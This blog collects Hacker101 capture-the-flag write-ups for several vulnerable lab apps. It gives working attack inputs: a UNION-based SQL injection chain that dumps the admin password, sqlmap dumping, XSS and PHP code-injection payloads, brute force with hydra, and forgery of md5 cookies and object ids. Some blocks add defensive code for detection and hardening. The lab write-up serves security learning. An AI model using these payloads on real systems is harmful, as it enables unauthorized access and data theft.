Challenge Blogs

WRNET:Sec 1.6 - Slackware part 1. (Soon)

2021-10-05 23:48:37 admin

I am going to do a live stream covering the install and why I've chosen Slackware Linux over the many user-friendly distros out there.

Follow me on twitch / dlive for when I do go live.

Posted in: CTF Challenges

Write-up: Hacker101 – Petshop Pro

2020-05-25 04:46:33 admin

Flag 0

  • Burp Suite intercept: change the %3A+7.95%2C to %3A+0%2C and let it load.
  • Flag 0 found; this is easy!

Flag 1

  • Locating the admin interface login: off the top of my head I tried admin, Admin, ps-admin and login, and bingo, found /Login.
  • Used Repeater and dumped the username; GitHub is a good place to get a common usernames list.
  • Get a list for the passwords too; this will take a while. I used hydra for this task and built a script to dump the username and password. This one took about an hour.
  • Found a user/password combo and logged in.
  • Flag 1 found; brute force was the key here.

Flag 2

  • This one relied upon an XSS exploit, so you need to dump it as the user: go edit a product, add the following in the name and description and hit save: <img src=x onerror=alert(1)>
  • Add the product to the shopping cart and check out.
  • Flag 2 found during checkout.
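The Flag 0 step above works because the checkout trusts a price that travels in the request. As an added example (not the challenge's code), here is the flawed total next to a hardened one that recomputes prices from a server-side catalog; the cart field shape, the catalog prices and the tampered form body are constructed assumptions:

```python
import json
from urllib.parse import unquote_plus

# Server-side price list, constructed for this example (not the challenge's data).
CATALOG = {"Cat": 7.95, "Dog": 9.95}


def parse_cart(form_value: str) -> list:
    """Decode the URL-encoded cart field into line items.

    Assumed field shape (constructed): a JSON list of {"name", "price", "qty"}
    objects, which is why "%3A+7.95%2C" decodes to the ": 7.95," edited in Burp.
    """
    return json.loads(unquote_plus(form_value))


def total_trusting_client(cart: list) -> float:
    """The flawed pattern: the price is read back from the submitted form."""
    return round(sum(float(i["price"]) * int(i["qty"]) for i in cart), 2)


def total_from_catalog(cart: list) -> float:
    """Hardened: the client picks items and quantities, never prices."""
    total = 0.0
    for item in cart:
        name = item.get("name")
        if name not in CATALOG:
            raise ValueError(f"unknown product: {name!r}")
        qty = int(item.get("qty", 0))
        if qty < 1:
            raise ValueError(f"bad quantity for {name!r}: {qty}")
        total += CATALOG[name] * qty
    return round(total, 2)


def tampered_items(cart: list) -> list:
    """Names whose submitted price disagrees with the catalog: log these."""
    return [i["name"] for i in cart
            if i["name"] in CATALOG and float(i["price"]) != CATALOG[i["name"]]]


# Constructed form body after the edit the write-up describes: the Cat's price
# was changed from 7.95 to 0 before the checkout form was submitted.
TAMPERED_FORM = "%5B%7B%22name%22%3A+%22Cat%22%2C+%22price%22%3A+0%2C+%22qty%22%3A+1%7D%5D"
```

A mismatch reported by tampered_items is worth logging as a tampering indicator rather than silently correcting the total.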

 

Posted in: CTF Challenges

Write-up: Hacker101 – Tickettastic Demo & Live instance.

2020-05-25 04:33:44 admin

Flag 0

  • Review the demo and take notes on how this is all set up.
  • Now view the live instance.
  • Demo and live look exactly the same code-wise.
  • Admin Login -> attempt admin / admin, but it shouldn't work.
  • Jump to "submit a ticket" and add in this information to inject some code and see if it works:
  • <a href="http://localhost/newUser?username=test&password=test&password2=test">TEST</a>
  • Now log in with the new account.
  • Read the flag: won't work.
  • Flag 0 found.

Flag 1

  • Use Burp Suite to find the request; we will focus on ticket?id=1 and dumping the admin login creds.
  • ticket?id=1' -> shows that it is running a MySQL database, but we got an error message; let's run down a quick list.
  • Let's try this one: ticket?id=1 AND 1=1 *this one works*, no flag though, but ticket?id=1 AND 1=2 does not.
  • Let's see if we can find the number of columns. ticket?id=1 AND 1=1 ORDER BY 10 does not work, but ticket?id=1 AND 1=1 ORDER BY 3 does; ticket?id=1 AND 1=1 ORDER BY 4 errors out. So let's UNION SELECT.
  • ticket?id=1.1 UNION SELECT 1,2,3-- shows the 1, 2 (our reply), 3.
  • Let's have some fun: let's see if we can dump the version of the database.
  • ticket?id=1.1 UNION SELECT VERSION(),DATABASE(),3--
  • Now let's get a table name:
  • ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()--
  • This should show 2 tables; the one we want is "users".
  • Let's dump the column names:
  • ticket?id=1.1 UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA=DATABASE() AND TABLE_NAME='users'--
  • This will dump id, username, password. Oh, we are close to admin now!
  • ticket?id=1.1 UNION SELECT 1,password,3 FROM users WHERE username='admin'--
  • Flag 1 found.
  • I just learned something: we could have just done this the easier way.
  • Burp Suite > read the GET request, save that to a file and use sqlmap -r therequest.txt --dump
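Every stage of the Flag 1 probe sequence leaves a distinctive query string in the web server log. As an added example (not part of the original write-up), this Python detector URL-decodes the `id` parameter, which the application expects to be an integer, and tags anything else with the probe stage it resembles; the access-log layout and the sample lines are constructed for the example:

```python
import re
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines (not from the original page) whose query strings
# mirror the probe sequence the write-up walks through.
SAMPLE_LOG = """\
10.0.0.5 - - [25/May/2020:04:30:01 +0000] "GET /ticket?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [25/May/2020:04:30:07 +0000] "GET /ticket?id=1%27 HTTP/1.1" 500 88
10.0.0.5 - - [25/May/2020:04:30:15 +0000] "GET /ticket?id=1+AND+1%3D1+ORDER+BY+3 HTTP/1.1" 200 512
10.0.0.5 - - [25/May/2020:04:30:22 +0000] "GET /ticket?id=1.1+UNION+SELECT+1,2,3-- HTTP/1.1" 200 530
10.0.0.5 - - [25/May/2020:04:30:40 +0000] "GET /ticket?id=1.1+UNION+SELECT+1,GROUP_CONCAT(TABLE_NAME),3+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA%3DDATABASE()-- HTTP/1.1" 200 610
10.0.0.9 - - [25/May/2020:04:31:02 +0000] "GET /ticket?id=7 HTTP/1.1" 200 498
"""

# Combined-log-format request line (assumed layout for this example).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) '
                    r'(?P<target>\S+) [^"]*" (?P<status>\d{3})')

# One signature per probe stage, checked against the URL-decoded value.
SIGNATURES = [
    ("union_select", re.compile(r"\bunion\b\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\b", re.I)),
    ("column_probe", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("tautology", re.compile(r"\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("comment_tail", re.compile(r"--|#|/\*")),
    ("syntax_probe", re.compile(r"['\"]")),
]


def scan_line(line: str, numeric_params=("id",)) -> Optional[dict]:
    """Flag a request whose integer-only parameter carries anything but digits."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for key, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if key not in numeric_params or value.isdigit():
            continue
        tags = [name for name, rx in SIGNATURES if rx.search(value)]
        return {"ip": m["ip"], "status": int(m["status"]), "param": key,
                "value": value, "tags": tags or ["non_numeric"]}
    return None


def scan_log(text: str) -> list:
    """Run scan_line over every line and keep the findings, in log order."""
    return [f for f in map(scan_line, text.splitlines()) if f]
```

The 500 on the quote probe is the same database error the write-up notices, so pairing a non-numeric `id` with a 5xx status is a strong first alert even before the UNION stage appears.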
Posted in: CTF Challenges

Write-up: Hacker101 – Postbook

2020-05-25 03:44:34 admin

Flag 0

  • Hint -> don't use common user / password combos.
  • Signed in with user / password as both the username and the password.
  • Flag 0 found.

Flag 1

  • As user, view the post:
  • index.php?page=view.php&id=1
  • Copy that and change the id to 2.
  • Flag 1 found.

Flag 2

  • Create a new post; use Burp Suite from here.
  • Intercept it before creating the post, check and modify the user_id value="2" to value="1", release the intercept and the web form posts as admin.
  • Flag 2 found.

Flag 3

  • The hint gives a number to multiply: 189 * 5 = 945.
  • Let's review 945:
  • index.php?page=view.php&id=945
  • Flag 3 found.

Flag 4

  • Use Burp's intercept again.
  • Edit the post and hit save; be sure to have intercept on so you can change id=3 to id=1, then release.
  • Flag 4 found.

Flag 5

  • Burp intercept: this time we are modifying cookies. You would need to md5 to find out what value 1 is. You will need to log out and log back in as user and intercept that login so you can also snag that cookie.
  • Take the current cookie from Burp; it should be the cookie id and resolve to number 2 as the md5 value.
  • When you get the md5 value for 1, paste it in the interception area for Burp and release to change the cookie id value.
  • Flag 5 found, as you have gone from user to admin.

Flag 6

  • Now let's intercept when you attempt to delete a post.
  • Again it uses md5 values when deleting posts, so change the value to 1's md5 value.
  • Flag 6 found. When you release it, it should drop another flag when you visit the post.
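Flags 1 to 6 all come down to two defects: object ids that are swapped with no ownership check, and a session cookie that is just md5 of the user id. As an added example (not the challenge's code), the block below shows the weak cookie beside a server-signed one and the per-post authorization check the id swaps bypass; the user ids, the post table and the cookie layout are constructed assumptions:

```python
import hashlib
import hmac
import secrets

# Constructed stand-ins for the challenge's data (assumptions for this example,
# not the real application): two accounts and one post each.
POSTS = {1: {"owner": 1, "body": "admin's private post"},
         2: {"owner": 2, "body": "user's post"}}
ADMIN_ID, USER_ID = 1, 2
SERVER_SECRET = secrets.token_bytes(32)   # never leaves the server


def weak_cookie(user_id: int) -> str:
    """The pattern the write-up abuses: the session cookie is just md5(user_id)."""
    return hashlib.md5(str(user_id).encode()).hexdigest()


def is_guessable(cookie: str, max_id: int = 10_000) -> bool:
    """Defender self-check: does the cookie equal md5 of a small integer?
    If so, any logged-in user can mint the cookie for any other account."""
    return any(weak_cookie(uid) == cookie for uid in range(1, max_id + 1))


def sign_session(user_id: int) -> str:
    """Hardened: bind the user id to an HMAC under a server-side secret."""
    mac = hmac.new(SERVER_SECRET, str(user_id).encode(), hashlib.sha256).hexdigest()
    return f"{user_id}.{mac}"


def verify_session(cookie: str):
    """Return the user id only if the MAC matches (constant-time compare)."""
    uid_text, sep, mac = cookie.partition(".")
    if not sep or not uid_text.isdigit():
        return None
    expected = hmac.new(SERVER_SECRET, uid_text.encode(), hashlib.sha256).hexdigest()
    return int(uid_text) if hmac.compare_digest(mac, expected) else None


def can_touch_post(session_user, post_id: int) -> bool:
    """Object-level check for view/edit/delete that the id-swapping steps bypass."""
    post = POSTS.get(post_id)
    return session_user is not None and post is not None and post["owner"] == session_user
```

Signing only fixes the cookie; the view, edit and delete handlers still need can_touch_post (or an equivalent ownership query) on every request that names a post id.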

 

Posted in: CTF Challenges

Write-up: Hacker101 – Cody's First Blog

2020-05-25 03:01:53 admin



Flag 0

  • Too much information was given on the first step. If you read it right, you have 2 red flags already: 1, it's PHP and, second, include(). Nothing wrong with PHP per se; it's just that when you are new to it, you make a lot of security mistakes.
  • XSS won't pass in here; tried, but it won't work here.
  • But if a few commands weren't closed in the backend, try to pass some PHP code in an HTML format and see what you get.
  • i.e. in the comments type <?php phpinfo()?>
  • Flag 0 found; geez, that was too easy.

Flag 1

  • All CMS / blog systems have an admin interface; I mean, it's a way to control a blog content management system.
  • I used Burp Suite for this to investigate what goes where and what gets executed, and I found ?page=admin.auth.inc
  • Found user/password.
  • Let's do something extremely silly: as this is "Cody's first blog", after all, let's see if he made a mistake. Remove auth and use ?page=admin.inc
  • Flag 1 found.

Flag 2

  • Using Burp Suite to see more of what gets passed through.
  • The idea for this one is to use PHP blind injection to read the index.php source.
  • Pop in this command; this took me a bit to find as it's been a while since I've used PHP.
  • <?php echo readfile("index.php")?> in the comments, like in Flag 0.
  • Check the source (or use Burp to see the source).
  • Flag 2 found in the index.php source.

Posted in: CTF Challenges